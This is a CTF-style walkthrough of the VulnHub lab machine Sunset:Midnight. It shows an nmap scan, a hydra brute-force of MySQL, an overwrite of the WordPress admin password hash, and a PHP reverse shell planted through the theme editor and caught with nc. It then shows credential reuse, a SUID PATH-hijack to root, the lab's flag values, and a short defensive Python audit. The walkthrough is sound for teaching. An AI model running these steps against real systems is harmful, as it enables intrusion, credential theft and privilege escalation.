[VULNHUB] Sunset:Midnight

Today we are going to hack the Vulnhub machine called Sunset:Midnight. You can download it from the following link: https://www.vulnhub.com/entry/sunset-midnight,517/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.112
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-18 10:50 CEST
    Nmap scan report for midnight.home (192.168.1.112)
    Host is up (0.00040s latency).
    Not shown: 65532 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
    |   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
    |_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
    80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
    | http-robots.txt: 1 disallowed entry
    |_/wp-admin/
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Did not follow redirect to http://sunset-midnight/
    3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
    | mysql-info:
    |   Protocol: 10
    |   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
    |   Thread ID: 15
    |   Capabilities flags: 63486
    |   Some Capabilities: InteractiveClient, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, Speaks41ProtocolNew, ODBCClient, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
    |   Status: Autocommit
    |   Salt: WpR'kgE^-c+Jq{9H@DvG
    |_  Auth Plugin Name: 104
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
    We see that port 3306 (mysql) is open and that we can interact with it, so we brute-force the MySQL root user with hydra.
    ~ > hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.1.112 mysql
    Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-18 10:51:34
    [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
    [DATA] attacking mysql://192.168.1.112:3306/
    [3306][mysql] host: 192.168.1.112   login: root   password: robert
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-18 10:51:43
    We found the password! We log in to MySQL with the credentials we obtained.
    ~ > mysql mysql -h 192.168.1.112 -u root -p
    Enter password:
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MariaDB monitor.  Commands end with ; or \g.
    Your MariaDB connection id is 206
    Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

    Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

    MariaDB [mysql]>
    We check which databases exist.
    MariaDB [mysql]> show databases;
    +--------------------+
    | Database           |
    +--------------------+
    | information_schema |
    | mysql              |
    | performance_schema |
    | wordpress_db       |
    +--------------------+
    4 rows in set (0.001 sec)

    MariaDB [mysql]>
    We select the "wordpress_db" database and look at its tables...
    MariaDB [mysql]> use wordpress_db
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Database changed
    MariaDB [wordpress_db]> show tables;
    +------------------------+
    | Tables_in_wordpress_db |
    +------------------------+
    | wp_commentmeta         |
    | wp_comments            |
    | wp_links               |
    | wp_options             |
    | wp_postmeta            |
    | wp_posts               |
    | wp_sp_polls            |
    | wp_term_relationships  |
    | wp_term_taxonomy       |
    | wp_termmeta            |
    | wp_terms               |
    | wp_usermeta            |
    | wp_users               |
    +------------------------+
    13 rows in set (0.001 sec)

    MariaDB [wordpress_db]>
    We look at the "wp_users" table.
    MariaDB [wordpress_db]> select * from wp_users;
    +----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
    | ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
    +----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
    |  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
    +----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
    1 row in set (0.000 sec)

    MariaDB [wordpress_db]>
    Since we are "root", we can modify the table's data. We will change the password so we can log in to WordPress as admin. WordPress still accepts a legacy 32-character MD5 value in user_pass (it re-hashes it with phpass on the next successful login), so a plain md5sum is enough to generate one:
    ~ > echo -n "pass123" | md5sum
    32250170a0dca92d53ec9624f336ca24  -
    We run the update (the password is pass123):
    MariaDB [wordpress_db]> update wp_users SET user_pass="32250170a0dca92d53ec9624f336ca24" where user_login="admin"
        -> ;
    Query OK, 1 row affected (0.010 sec)
    Rows matched: 1  Changed: 1  Warnings: 0
    We add the following line to /etc/hosts:
    192.168.1.112 sunset-midnight
    and visit http://sunset-midnight/wp-login.php. We are now logged in to WordPress as admin :)
    Next we add a reverse shell. We edit /usr/share/webshells/php/php-reverse-shell.php and set our IP. Once it is modified, in WordPress we go to Appearance -> Theme Editor and edit header.php, appending our PHP reverse shell. With that saved, we start nc listening:
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    We visit http://sunset-midnight/ and get our shell :)
  • Low Shell
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.112] 54120
    Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
     06:01:19 up  1:11,  0 users,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    Once inside, we explore the system. Since WordPress is installed, we look at the wp-config.php file.
    www-data@midnight:/$ cd /var/www/html/wordpress
    www-data@midnight:/var/www/html/wordpress$ ls
    index.php        wp-blog-header.php    wp-includes        wp-settings.php
    license.txt      wp-comments-post.php  wp-links-opml.php  wp-signup.php
    readme.html      wp-config.php         wp-load.php        wp-trackback.php
    wp-activate.php  wp-content            wp-login.php       xmlrpc.php
    wp-admin         wp-cron.php           wp-mail.php
    www-data@midnight:/var/www/html/wordpress$ cat wp-config.php
    --SNIP--
    define( 'DB_NAME', 'wordpress_db' );
    define( 'DB_USER', 'jose' );
    define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
    define( 'DB_HOST', 'localhost' );
    --SNIP--
    We see that wp-config.php contains the user "jose" and his password. We know there is a user called jose on the system, so we try to log in with those credentials.
    www-data@midnight:/home$ su jose
    Password: 645dc5a8871d2a4269d4cbe23f6ae103
    jose@midnight:/home$ id
    uid=1000(jose) gid=1000(jose) groups=1000(jose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
  • user.txt
    Now as jose, we read the user.txt flag.
    jose@midnight:/home$ cd /home/jose
    jose@midnight:~$ ls
    user.txt
    jose@midnight:~$ cat user.txt
    956a9564aa5632edca7b745c696f6575
    We keep looking around the system; in this case we go on to check the SUID files.
    jose@midnight:~$ find / -perm -4000 2>/dev/null
    --SNIP--
    /usr/bin/su
    /usr/bin/sudo
    /usr/bin/status
    /usr/lib/openssh/ssh-keysign
    --SNIP--
    We see a "status" binary, which is not usual; we take a look at it with strings to see if there is anything interesting.
  • Privilege Escalation
    jose@midnight:~$ strings /usr/bin/status
    --SNIP--
    /lib64/ld-linux-x86-64.so.2
    libc.so.6
    setuid
    service ssh status
    --SNIP--
    We see that the binary runs "service ssh status" using a relative path rather than an absolute one, so we can create our own "service", change $PATH and run the binary so that our "service" is executed with root privileges. Our "service" will simply be a file containing "/bin/bash", so that it gives us a root shell. Let's set it up!
    jose@midnight:~$ echo "/bin/bash" > service
    jose@midnight:~$ chmod +x service
    jose@midnight:~$ export PATH=.:$PATH
    jose@midnight:~$ /usr/bin/status
    root@midnight:~# id
    uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
    We now have a privileged shell!
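    As an added defensive example (not part of the original writeup), the following Python audits the two conditions this escalation depends on: a setuid binary that invokes a command by bare name, and a PATH that resolves bare names from a user-writable directory. SAMPLE_STRINGS is a constructed copy of the `strings /usr/bin/status` output above; KNOWN_COMMANDS and the in-memory filesystem are assumptions.

```python
import shlex
from typing import Callable, Iterable, List, Optional

# Constructed sample: the interesting lines `strings` printed for /usr/bin/status above.
SAMPLE_STRINGS = ["/lib64/ld-linux-x86-64.so.2", "libc.so.6", "setuid",
                  "service ssh status"]

# Assumed list of program names worth flagging when a binary invokes them by bare name.
KNOWN_COMMANDS = {"service", "systemctl", "sh", "bash", "cat", "ls", "cp", "chmod"}


def relative_command_lines(strings: Iterable[str], known=KNOWN_COMMANDS) -> List[str]:
    """Return the strings that look like a shell command whose program is named
    without a directory, i.e. one that system()/popen() resolves through $PATH."""
    hits = []
    for s in strings:
        try:
            argv = shlex.split(s)
        except ValueError:        # unbalanced quotes: not a command line we can parse
            continue
        if argv and "/" not in argv[0] and argv[0] in known:
            hits.append(s)
    return hits


def risky_path_entries(path: str) -> List[str]:
    """PATH entries an unprivileged user can populate: '' and '.' both mean the
    current directory, and any other relative entry is resolved from wherever
    the caller happens to be when the setuid binary runs."""
    return [e for e in path.split(":") if e == "" or not e.startswith("/")]


def resolve_command(prog: str, path: str, exists: Callable[[str], bool]) -> Optional[str]:
    """Mimic the shell's left-to-right lookup of a bare command name along PATH.
    `exists` stands in for the filesystem so the lookup can be checked offline."""
    for entry in path.split(":"):
        candidate = (entry or ".") + "/" + prog
        if exists(candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed filesystem: the real service(8) plus the file jose created in his cwd.
    fake_fs = {"/usr/sbin/service", "./service"}
    print(relative_command_lines(SAMPLE_STRINGS))                                   # ['service ssh status']
    print(risky_path_entries(".:/usr/local/bin:/usr/bin"))                          # ['.']
    print(resolve_command("service", "/usr/sbin:/usr/bin", fake_fs.__contains__))   # /usr/sbin/service
    print(resolve_command("service", ".:/usr/sbin:/usr/bin", fake_fs.__contains__)) # ./service
```

    The fix on the binary's side is to call the program by absolute path (/usr/sbin/service) and to reset the environment before the call, so that a caller's PATH never takes part in the lookup.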
  • root.txt
    root@midnight:~# cd /root
    root@midnight:/root# ls
    root.txt  status  status.c
    root@midnight:/root# cat root.txt
    [ASCII-art banner omitted]
    db2def9d4ddcb83902b884de39d426e6

    Thanks for playing! - Felipe Winsnes (@whitecr0wz)
  • End
    And with that we are root on the machine.